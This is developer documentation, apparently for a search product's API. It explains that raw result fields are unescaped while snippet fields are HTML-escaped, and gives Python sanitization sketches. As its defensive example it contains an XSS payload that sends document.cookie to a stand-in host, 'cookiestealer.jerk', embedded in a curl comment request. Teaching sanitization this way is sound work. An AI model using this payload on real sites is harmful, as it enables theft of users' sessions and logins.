Sanitization Guide
A query against your Engine returns documents.
A document, in its tidiest form, looks like so:
{
  "nps_link": "https://www.nps.gov/romo/index.htm",
  "title": "Rocky Mountain",
  "date_established": "1915-01-26T06:00:00+00:00",
  "world_heritage_site": "false",
  "states": [
    "Colorado"
  ],
  "description": "Bisected north to south by the Continental Divide, this portion of the Rockies has ecosystems varying from over 150 riparian lakes to montane and subalpine forests to treeless alpine tundra. Wildlife including mule deer, bighorn sheep, black bears, and cougars inhabit its igneous mountains and glacial valleys. Longs Peak, a classic Colorado fourteener, and the scenic Bear Lake are popular destinations, as well as the historic Trail Ridge Road, which reaches an elevation of more than 12,000 feet (3,700 m).",
  "visitors": 4517585,
  "id": "park_rocky-mountain",
  "location": "40.4,-105.58",
  "square_km": 1075.6,
  "acres": 265795.2
}
It is a classic JSON object with key/value pairs.
When a document is returned via search, the presentation of the values will change depending on how you have parameterized your query.
A very basic query, with no alteration, will return raw values:
{
  "nps_link": {
    "raw": "https://www.nps.gov/romo/index.htm"
  },
  "title": {
    "raw": "Rocky Mountain"
  },
  "date_established": {
    "raw": "1915-01-26T06:00:00+00:00"
  },
  "world_heritage_site": {
    "raw": "false"
  },
  "states": {
    "raw": [
      "Colorado"
    ]
  },
  "description": {
    "raw": "Bisected north to south by the Continental Divide, this portion of the Rockies has ecosystems varying from over 150 riparian lakes to montane and subalpine forests to treeless alpine tundra. Wildlife including mule deer, bighorn sheep, black bears, and cougars inhabit its igneous mountains and glacial valleys. Longs Peak, a classic Colorado fourteener, and the scenic Bear Lake are popular destinations, as well as the historic Trail Ridge Road, which reaches an elevation of more than 12,000 feet (3,700 m)."
  },
  "visitors": {
    "raw": 4517585
  },
  "id": {
    "raw": "park_rocky-mountain"
  },
  "location": {
    "raw": "40.4,-105.58"
  },
  "square_km": {
    "raw": 1075.6
  },
  "acres": {
    "raw": 265795.2
  },
  "_meta": {
    "score": 17.739115
  }
}
A raw value is un-sanitized.
It is an exact representation of the value within a field. And it may be vulnerable to XSS risks!
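To make the response shape concrete, here is a minimal Python sketch that pulls the raw value out of each field of one result. The helper name `raw_values` is hypothetical and not part of any App Search client; it only assumes the `{"field": {"raw": ...}}` layout shown above.

```python
from typing import Any, Dict


def raw_values(result: Dict[str, Any]) -> Dict[str, Any]:
    """Collect the "raw" value of every field in one search result.

    Keys without a "raw" entry (such as "_meta") are skipped.
    The values are returned exactly as stored: nothing is escaped here.
    """
    return {
        field: value["raw"]
        for field, value in result.items()
        if isinstance(value, dict) and "raw" in value
    }


# A trimmed-down copy of the result shown above.
result = {
    "title": {"raw": "Rocky Mountain"},
    "visitors": {"raw": 4517585},
    "_meta": {"score": 17.739115},
}

print(raw_values(result))
```

Because the values come back untouched, anything that ends up in HTML still needs escaping on your side.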
An enhancement to the basic query is the result_fields parameter.
It allows one to specify how many characters to return and whether to return a raw or snippet value.
A snippet value can be between 20 and 1000 characters.
A raw value must be at least 20 characters. It does not have an upper bound, apart from the maximum document size.
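The size limits above can be checked before a query is sent. The following Python sketch builds the `result_fields` entry for one field and rejects sizes outside the limits stated in this guide. The function name `result_field` and the constants are illustrative assumptions, not part of an official client.

```python
from typing import Dict, Optional

# Limits as stated in this guide.
SNIPPET_MIN, SNIPPET_MAX = 20, 1000
RAW_MIN = 20


def result_field(raw_size: Optional[int] = None,
                 snippet_size: Optional[int] = None) -> Dict[str, Dict[str, int]]:
    """Build the result_fields entry for a single field, validating sizes."""
    spec: Dict[str, Dict[str, int]] = {}
    if raw_size is not None:
        if raw_size < RAW_MIN:
            raise ValueError(f"raw size must be at least {RAW_MIN}")
        spec["raw"] = {"size": raw_size}
    if snippet_size is not None:
        if not SNIPPET_MIN <= snippet_size <= SNIPPET_MAX:
            raise ValueError(
                f"snippet size must be between {SNIPPET_MIN} and {SNIPPET_MAX}"
            )
        spec["snippet"] = {"size": snippet_size}
    return spec


# Request body asking for a 20-character raw description.
body = {
    "query": "rocky mountain national park",
    "result_fields": {"description": result_field(raw_size=20)},
}
print(body)
```

Validating on the client side is optional, but it surfaces a bad size before the request leaves your application.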
For demonstration purposes, the following query...
curl -X GET '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/national-parks-demo/search' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer search-soaewu2ye6uc45dr8mcd54v8' \
-d '{
  "query": "rocky mountain national park",
  "result_fields": {
    "description": {
      "raw": {
        "size": 20
      }
    }
  }
}'
will return only one field, description, in raw format, which has been chopped due to the "size": 20 parameter:
...
{
  "description": {
    "raw": "Bisected north to"
  },
  "id": {
    "raw": "park_rocky-mountain"
  },
  "_meta": {
    "score": 14.25167
  }
}
...
Instead of asking for a raw value, we can also request a snippet.
Snippets enhance the user experience by highlighting direct query matches within your results.
They work only on text fields.
And they also act as a sort of preventative measure against Cross-site Scripting (XSS) attacks.
Within your application, you might allow users to comment on a product, write articles, or provide status updates.
Perhaps that looks something like this:
curl -X POST 'https://example.com/product/3/comment' \
-H 'Content-Type: application/json' \
-d '{
  "comment": "An amazing product!"
}'
If the input has not been sanitized, some shady character might take advantage.
They can inject malicious JavaScript alongside the comment...!
This fake script is designed to steal the cookies of a site goer, which the attacker could then use to steal a user’s login or personal information:
<script>window.location='http://cookiestealer.jerk/?stolencookie='+document.cookie</script>
curl -X POST 'https://example.com/product/3/comment' \
-H 'Content-Type: application/json' \
-d '{
  "comment": "An amazing <script>window.location='\''http://cookiestealer.jerk/?stolencookie='\''+document.cookie</script> product!"
}'
Now this comment might be sent both to your database and your Engine for searching.
Since you want your comments searchable, the full text value would be indexed — including the malicious JavaScript.
If we were returning raw values, we would return the exact contents of the matching document field. And so this...
curl -X POST '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/xss-demo/search' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer search-7eud55t7ecdmqzcanjsc9cqu' \
-d '{
  "query": "amazing",
  "result_fields": {
    "comment": {
      "raw": {
        "size": 200
      }
    }
  }
}'
... would return this:
...
{
  ...
  "comment": {
    "raw": "An amazing <script>window.location='http://cookiestealer.jerk/?stolencookie='+document.cookie</script> product!"
  }
  ...
}
...
Depending on how you are displaying your search results, this could inject the malicious code into your searcher’s results.
This is dangerous!
A snippet does not have this risk...
curl -X POST '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/xss-demo/search' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer search-7eud55t7ecdmqzcanjsc9cqu' \
-d '{
  "query": "amazing",
  "result_fields": {
    "comment": {
      "snippet": {
        "size": 200
      }
    }
  }
}'
Which would return this:
{
  ...
  "comment": {
    "snippet": "An <em>amazing</em> &lt;script&gt;window.location=&#x27;http:&#x2F;&#x2F;cookiestealer.jerk&#x2F;?stolencookie=&#x27;+document.cookie&lt;&#x2F;script&gt; product!"
  }
  ...
}
Ah-ha! The malicious code has become gibberish. The only browser-interpretable values that snippets return are the <em></em> tags.
Your moderators can see very quickly that someone is up to no good and you can remove offending documents from your Engine.
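To see why a snippet is harmless to a browser, the idea can be imitated in a few lines of Python: escape the text, then wrap query matches in `<em>` tags. This is an illustration only. The function `make_snippet` is hypothetical, it is not how App Search builds snippets internally, and the exact entities App Search emits may differ from those produced by Python's `html.escape`.

```python
import html
import re


def make_snippet(text: str, query: str) -> str:
    """Escape `text` and wrap case-insensitive matches of `query` in <em>."""
    if not query:
        return html.escape(text)
    # With one capturing group, re.split keeps the matches at odd indexes.
    parts = re.split(f"({re.escape(query)})", text, flags=re.IGNORECASE)
    return "".join(
        f"<em>{html.escape(part)}</em>" if index % 2 else html.escape(part)
        for index, part in enumerate(parts)
    )


comment = "An amazing <script>alert(1)</script> product!"
print(make_snippet(comment, "amazing"))
# An <em>amazing</em> &lt;script&gt;alert(1)&lt;/script&gt; product!
```

The text is split before it is escaped so that a query can never match inside an entity such as `&lt;`.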
While snippets provide some coverage for XSS intrusions, their key purpose is to improve the scan-ability of search results.
Highlighted query matches provide a better user experience. And raw responses are valuable, too.
They should be used, but with caution.
A common risky case is injecting a raw value straight into the DOM, for example by rendering href={result.url.raw} within your results.
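For link attributes, escaping alone is not enough, because a value such as `javascript:...` contains no characters that need escaping. One possible guard, sketched here in Python for a server-rendered page, is to allow only known URL schemes. The name `safe_href`, the allow-list, and the `#` fallback are assumptions made for this example.

```python
import html
from urllib.parse import urlsplit

# Schemes we are willing to emit in an href attribute (an assumption;
# adjust to your application).
ALLOWED_SCHEMES = {"http", "https"}


def safe_href(url: str, fallback: str = "#") -> str:
    """Return an attribute-safe URL, or `fallback` if the scheme is not allowed."""
    candidate = url.strip()
    try:
        scheme = urlsplit(candidate).scheme.lower()
    except ValueError:
        # urlsplit raises ValueError on some malformed URLs.
        return fallback
    if scheme not in ALLOWED_SCHEMES:
        return fallback
    # Escape quotes and angle brackets so the value cannot break out
    # of the attribute it is placed in.
    return html.escape(candidate, quote=True)


print(safe_href("https://www.nps.gov/romo/index.htm"))
print(safe_href("javascript:alert(document.cookie)"))
```

Note that this sketch also rejects relative URLs, since they carry no scheme. Loosen the check if your results legitimately contain them.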
We hope the potential risks of accepting un-sanitized raw values are now clear.
Be sure to implement your own mechanism of sanitization!
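As one possible starting point, the sketch below escapes raw values with Python's standard `html.escape` before they are placed into HTML. The helper `escape_raw` is hypothetical, and this is a minimal example under the assumption that results are rendered as HTML text; it is not a complete sanitization strategy.

```python
import html
from typing import Any


def escape_raw(value: Any) -> Any:
    """HTML-escape strings (and strings inside lists); leave other types as-is."""
    if isinstance(value, str):
        return html.escape(value, quote=True)
    if isinstance(value, list):
        return [escape_raw(item) for item in value]
    return value


comment = (
    "An amazing <script>window.location='http://cookiestealer.jerk/"
    "?stolencookie='+document.cookie</script> product!"
)
# The <script> tag is now inert text rather than executable markup.
print(escape_raw(comment))
```

Escaping at render time, rather than at index time, keeps the stored document intact while making the output safe to display.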
Equipped with this insight into sanitization, check out the Results Fields API Reference.